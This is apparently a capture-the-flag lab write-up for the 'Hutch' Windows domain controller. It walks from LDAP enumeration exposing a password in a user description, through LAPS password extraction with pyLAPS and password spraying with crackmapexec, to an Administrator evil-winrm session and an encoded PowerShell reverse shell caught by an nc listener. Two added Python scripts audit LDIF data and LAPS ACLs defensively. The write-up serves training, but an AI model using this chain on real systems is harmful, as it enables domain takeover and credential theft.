
Hutch

Network

  • IP Target: 192.168.166.122

Enumeration

Port     | Service          | Version                                 | Notes
---------|------------------|-----------------------------------------|---------
53/tcp   | domain           | Simple DNS Plus                         | DNS
80/tcp   | http             | Microsoft IIS httpd                     | HTTP
88/tcp   | kerberos-sec     | Microsoft Windows Kerberos              | KERBEROS
135/tcp  | msrpc            | Microsoft Windows RPC                   | MSRPC
139/tcp  | netbios-ssn      | Microsoft Windows Active Directory LDAP | LDAP
389/tcp  | ldap             |                                         | LDAP
445/tcp  | microsoft-ds     |                                         | SMB
464/tcp  | kpasswd5         |                                         |
593/tcp  | http-rpc-epmap   | Microsoft Windows RPC                   | MSRPC
636/tcp  | ldapssl          |                                         | LDAP
3268/tcp | globalcatLDAP    | Microsoft Windows Active Directory LDAP | LDAP
3269/tcp | globalcatLDAPssl |                                         | LDAP
5985/tcp | wsman            | Microsoft HTTPAPI                       | OMI
9389/tcp | adws             | .NET Message Framing                    |
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt 192.168.166.122
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 17:49 CET
Nmap scan report for 192.168.166.122
Host is up (0.11s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49666/tcp open  unknown
49668/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49692/tcp open  unknown
49755/tcp open  unknown
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ sudo nmap -Pn -sC -sV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389 -oN alltcp.txt 192.168.166.122
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 18:13 CET
Nmap scan report for 192.168.166.122
Host is up (0.052s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/10.0
| http-webdav-scan: 
|   Server Type: Microsoft-IIS/10.0
|   WebDAV type: Unknown
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|_  Server Date: Tue, 24 Dec 2024 17:13:57 GMT
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-24 17:13:53Z)
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-24T17:13:59
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Port 80

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ sudo feroxbuster -u http://192.168.166.122 -w /usr/share/dirb/wordlists/big.txt

Port 445

Port 389, 636, 3268, 3269

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ ldapsearch -x -H ldap://192.168.166.122  -b "dc=hutch,dc=offsec"

[...]
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
 hange on next login.
distinguishedName: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
instanceType: 4
whenCreated: 20201104053505.0Z
whenChanged: 20210216133934.0Z
uSNCreated: 12831
uSNChanged: 49179
name: Freddy McSorley
objectGUID:: TxilGIhMVkuei6KplCd8ug==
userAccountControl: 66048
badPwdCount: 1384
codePage: 0
countryCode: 0
badPasswordTime: 133795403581235365
lastLogoff: 0
lastLogon: 132579563744834908
pwdLastSet: 132489417058152751
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAARZojhOF3UxtpokGnWwQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: fmcsorley
sAMAccountType: 805306368
userPrincipalName: fmcsorley@hutch.offsec
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=hutch,DC=offsec
dSCorePropagationData: 20201104053513.0Z
dSCorePropagationData: 16010101000001.0Z
lastLogonTimestamp: 132579563744834908
msDS-SupportedEncryptionTypes: 0

[...]
The description attribute of the user fmcsorley shows that the password was set to CrabSharkJellyfish192.

The following users are also found:

Bash
rplacidi
opatry
ltaunton
acostello
jsparwell
oknee
jmckendry
avictoria
jfrarey
eaburrow
cluddy
agitthouse
fmcsorley
Administrator
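
The credential above sits in a free-text attribute that any authenticated user can read, and the folded LDIF line ("Please c" / " hange on next login.") is the kind of thing a naive grep misses. As an added example, not part of the original write-up, the following Python script parses ldapsearch LDIF output (undoing RFC 2849 line folding), flags free-text attributes that mention a password, decodes userAccountControl (66048 above is NORMAL_ACCOUNT plus DONT_EXPIRE_PASSWORD) and marks accounts whose badPwdCount suggests guessing activity (1384 above). The sample entries are constructed from the record shown; the second user and the badPwdCount threshold are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample in the LDIF shape that ldapsearch prints. The first entry mirrors
# the fmcsorley record above (including the folded description line); the second user
# is an assumption added to show a clean record.
SAMPLE_LDIF = """\
# Freddy McSorley, Users, hutch.offsec
dn: CN=Freddy McSorley,CN=Users,DC=hutch,DC=offsec
objectClass: user
cn: Freddy McSorley
description: Password set to CrabSharkJellyfish192 at user's request. Please c
 hange on next login.
objectGUID:: TxilGIhMVkuei6KplCd8ug==
userAccountControl: 66048
badPwdCount: 1384
sAMAccountName: fmcsorley

# Jane Doe, Users, hutch.offsec (constructed)
dn: CN=Jane Doe,CN=Users,DC=hutch,DC=offsec
objectClass: user
description: Helpdesk analyst, 2nd floor
userAccountControl: 512
badPwdCount: 0
sAMAccountName: jdoe
"""

# userAccountControl bits ([MS-ADTS]); only the ones an auditor cares about here.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

# Free-text attributes admins tend to fill by hand, and words that suggest a secret.
FREE_TEXT_ATTRS = ("description", "info", "comment")
SECRET_HINT = re.compile(r"\b(pass(?:word|wd)?|pwd|credentials?)\b", re.IGNORECASE)

# badPwdCount at or above this is treated as a guessing/spraying signal (assumed threshold).
BAD_PWD_THRESHOLD = 50


def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Parse ldapsearch LDIF output into a list of {attribute: [values]} dicts.

    RFC 2849 folding is undone first: a line beginning with one space continues the
    previous line. Comments (#) are skipped, blank lines separate entries, and
    base64 values ('attr:: ...') are kept as the raw base64 text.
    """
    logical: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]          # unfold the continuation line
        else:
            logical.append(raw)

    entries: List[Dict[str, List[str]]] = []
    current: Dict[str, List[str]] = {}
    for line in logical:
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        current.setdefault(attr.strip(), []).append(value.lstrip(": ").strip())
    if current:
        entries.append(current)
    return entries


def decode_uac(value: int) -> List[str]:
    """Names of the set userAccountControl bits, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def credential_hints(entry: Dict[str, List[str]]) -> List[str]:
    """Values of free-text attributes that look like they carry a credential."""
    return [v for attr in FREE_TEXT_ATTRS for v in entry.get(attr, []) if SECRET_HINT.search(v)]


def audit_users(text: str) -> List[dict]:
    """One finding record per user entry in the LDIF text."""
    report = []
    for entry in parse_ldif(text):
        uac = int(entry.get("userAccountControl", ["0"])[0])
        bad = int(entry.get("badPwdCount", ["0"])[0])
        report.append({
            "sam": entry.get("sAMAccountName", ["?"])[0],
            "flags": decode_uac(uac),
            "credential_hints": credential_hints(entry),
            "spray_suspect": bad >= BAD_PWD_THRESHOLD,
        })
    return report


if __name__ == "__main__":
    for rec in audit_users(SAMPLE_LDIF):
        print(rec)
```

Feed it the saved output of the ldapsearch command above instead of SAMPLE_LDIF to run the same check across the whole Users container; the hit on fmcsorley is what a periodic description/info/comment scan should surface long before an external party does.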

Exploit

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ bloodhound-python -u fmcsorley -p CrabSharkJellyfish192 -d hutch.offsec -c All -ns 192.168.166.122
INFO: Found AD domain: hutch.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (hutchdc.hutch.offsec:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 18 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: hutchdc.hutch.offsec
INFO: Done in 00M 12S
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ ll
total 168
-rw-r--r-- 1 momphucker momphucker  3914 Dec 27 10:57 20241227105713_computers.json
-rw-r--r-- 1 momphucker momphucker 25435 Dec 27 10:57 20241227105713_containers.json
-rw-r--r-- 1 momphucker momphucker  3092 Dec 27 10:57 20241227105713_domains.json
-rw-r--r-- 1 momphucker momphucker  3970 Dec 27 10:57 20241227105713_gpos.json
-rw-r--r-- 1 momphucker momphucker 79344 Dec 27 10:57 20241227105713_groups.json
-rw-r--r-- 1 momphucker momphucker  1642 Dec 27 10:57 20241227105713_ous.json
-rw-r--r-- 1 momphucker momphucker 42366 Dec 27 10:57 20241227105713_users.json
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ wget https://raw.githubusercontent.com/p0dalirius/pyLAPS/main/pyLAPS.py
--2024-12-27 11:02:32--  https://raw.githubusercontent.com/p0dalirius/pyLAPS/main/pyLAPS.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17714 (17K) [text/plain]
Saving to: ‘pyLAPS.py’

pyLAPS.py                              100%[============================================================================>]  17.30K  --.-KB/s    in 0.005s  

2024-12-27 11:02:32 (3.27 MB/s) - ‘pyLAPS.py’ saved [17714/17714]


┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ ll
total 188
-rw-r--r-- 1 momphucker momphucker  3914 Dec 27 10:57 20241227105713_computers.json
-rw-r--r-- 1 momphucker momphucker 25435 Dec 27 10:57 20241227105713_containers.json
-rw-r--r-- 1 momphucker momphucker  3092 Dec 27 10:57 20241227105713_domains.json
-rw-r--r-- 1 momphucker momphucker  3970 Dec 27 10:57 20241227105713_gpos.json
-rw-r--r-- 1 momphucker momphucker 79344 Dec 27 10:57 20241227105713_groups.json
-rw-r--r-- 1 momphucker momphucker  1642 Dec 27 10:57 20241227105713_ous.json
-rw-r--r-- 1 momphucker momphucker 42366 Dec 27 10:57 20241227105713_users.json
-rw-r--r-- 1 momphucker momphucker 17714 Dec 27 11:02 pyLAPS.py

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ chmod +x pyLAPS.py

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ ./pyLAPS.py --action get -d hutch.offsec -u fmcsorley -p CrabSharkJellyfish192 --dc-ip 192.168.166.122
                 __    ___    ____  _____
    ____  __  __/ /   /   |  / __ \/ ___/
   / __ \/ / / / /   / /| | / /_/ /\__ \   
  / /_/ / /_/ / /___/ ___ |/ ____/___/ /   
 / .___/\__, /_____/_/  |_/_/    /____/    v1.2
/_/    /____/           @podalirius_           

[+] Extracting LAPS passwords of all computers ... 
  | HUTCHDC$             : #Wa8ls156!Wub}
[+] All done!
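
A standard domain account reading HUTCHDC$'s LAPS password means an ACE on the computer object grants that account, or a group it belongs to, rights over ms-Mcs-AdmPwd. Legacy LAPS marks that attribute confidential, so the grant that matters is control access on it or "All Extended Rights" (an empty object GUID), which is what Find-AdmPwdExtendedRights reports. As an added example, not part of the original write-up or of pyLAPS, this Python script audits a computer object's security descriptor in SDDL form and lists non-privileged principals holding such rights. The SDDL string and the S-1-5-21 SIDs are constructed; the ms-Mcs-AdmPwd GUID is a placeholder because its schemaIDGUID is generated per forest when the LAPS schema extension is installed.

```python
import re
from typing import List, Tuple

# Placeholder: ms-Mcs-AdmPwd has no well-known GUID. Its schemaIDGUID is generated when
# the LAPS schema extension is installed, so read it from the forest schema and set it
# here (lowercase).
LAPS_ATTR_GUID = "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"

# Constructed DACL for a computer object. The S-1-5-21-...-110x SIDs and the
# 11111111-... GUID (some unrelated attribute) are invented for the example.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(A;;GA;;;SY)"                                         # SYSTEM: full control
    "(A;;GA;;;DA)"                                         # Domain Admins: full control
    "(OA;;RP;11111111-2222-3333-4444-555555555555;;AU)"     # Authenticated Users read an unrelated attribute
    "(A;;CR;;;S-1-5-21-1111-2222-3333-1105)"               # a group holding All Extended Rights
    "(OA;;RP;aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee;;S-1-5-21-1111-2222-3333-1106)"  # a user reading ms-Mcs-AdmPwd
    "(D;;GA;;;S-1-5-21-1111-2222-3333-1107)"               # a deny ACE, never a grant
)

# Principals expected to hold LAPS read rights: Domain Admins, Enterprise Admins, SYSTEM
# and Builtin Administrators as SDDL aliases, or Domain/Enterprise Admins by RID.
PRIVILEGED_ALIASES = {"DA", "EA", "SY", "BA"}
PRIVILEGED_RIDS = {"512", "519"}

ACE_RE = re.compile(r"\(([^)]*)\)")
DACL_RE = re.compile(r"D:([A-Z]*)((?:\([^)]*\))+)")


def parse_dacl(sddl: str) -> List[dict]:
    """Split the D: section of an SDDL string into ACE dicts.

    An ACE is (type;flags;rights;object_guid;inherit_object_guid;sid). Symbolic rights
    are two-letter codes run together ("RPWP"); a hex mask is kept as a single token.
    """
    match = DACL_RE.search(sddl)
    if not match:
        return []
    aces = []
    for body in ACE_RE.findall(match.group(2)):
        parts = body.split(";")
        if len(parts) < 6:
            continue
        ace_type, flags, rights, obj_guid, _inh_guid, sid = parts[:6]
        if rights.lower().startswith("0x"):
            right_list = [rights]
        else:
            right_list = [rights[i:i + 2] for i in range(0, len(rights), 2)]
        aces.append({"type": ace_type, "flags": flags, "rights": right_list,
                     "object_guid": obj_guid.lower(), "sid": sid})
    return aces


def is_privileged(sid: str) -> bool:
    """True for the principals that are supposed to read LAPS passwords."""
    if sid in PRIVILEGED_ALIASES:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[-1] in PRIVILEGED_RIDS


def laps_readers(sddl: str, laps_attr_guid: str = LAPS_ATTR_GUID) -> List[Tuple[str, List[str]]]:
    """Allow ACEs that let a non-privileged principal read ms-Mcs-AdmPwd.

    Reading a confidential attribute needs control access (CR) on that attribute or on
    all extended rights (empty GUID), or GenericAll; an attribute-scoped RP is reported
    as well because it is the other half of the same grant.
    """
    guid = laps_attr_guid.lower()
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] not in ("A", "OA") or is_privileged(ace["sid"]):
            continue
        rights, obj = ace["rights"], ace["object_guid"]
        reasons = []
        if "GA" in rights:
            reasons.append("GenericAll")
        if "CR" in rights and obj == "":
            reasons.append("AllExtendedRights")
        if "CR" in rights and obj == guid:
            reasons.append("ControlAccess on ms-Mcs-AdmPwd")
        if "RP" in rights and obj == guid:
            reasons.append("ReadProperty on ms-Mcs-AdmPwd")
        if reasons:
            findings.append((ace["sid"], reasons))
    return findings


if __name__ == "__main__":
    for sid, reasons in laps_readers(SAMPLE_SDDL):
        print(f"{sid}: {', '.join(reasons)}")
```

In a real audit the SDDL comes from the computer object's nTSecurityDescriptor (for example the Sddl property of Get-Acl on the AD: drive), and any SID the script reports that is not a tier-0 group is a finding: on this box it would correspond to whatever grant let fmcsorley read the HUTCHDC$ password.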
Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ crackmapexec smb 192.168.166.122 -u users.txt -p '#Wa8ls156!Wub}' --continue-on-success
SMB         192.168.166.122 445    HUTCHDC          [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\rplacidi:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\opatry:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\ltaunton:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\acostello:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\jsparwell:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\oknee:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\jmckendry:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\avictoria:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\jfrarey:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\eaburrow:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\cluddy:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\agitthouse:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [-] hutch.offsec\fmcsorley:#Wa8ls156!Wub} STATUS_LOGON_FAILURE 
SMB         192.168.166.122 445    HUTCHDC          [+] hutch.offsec\Administrator:#Wa8ls156!Wub} (Pwn3d!)

┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ evil-winrm -i 192.168.166.122 -u Administrator -p '#Wa8ls156!Wub}' 

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
hutch\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> powershell -e [...]

Privilege Escalation

Bash
┌──(momphucker㉿kali-vmw-warmachine)-[~/Desktop/offsec_/machines/Hutch]
└─$ nc -nvlp 4455
listening on [any] 4455 ...
connect to [192.168.45.248] from (UNKNOWN) [192.168.166.122] 50865

PS C:\Users\Administrator\Documents> whoami
hutch\administrator
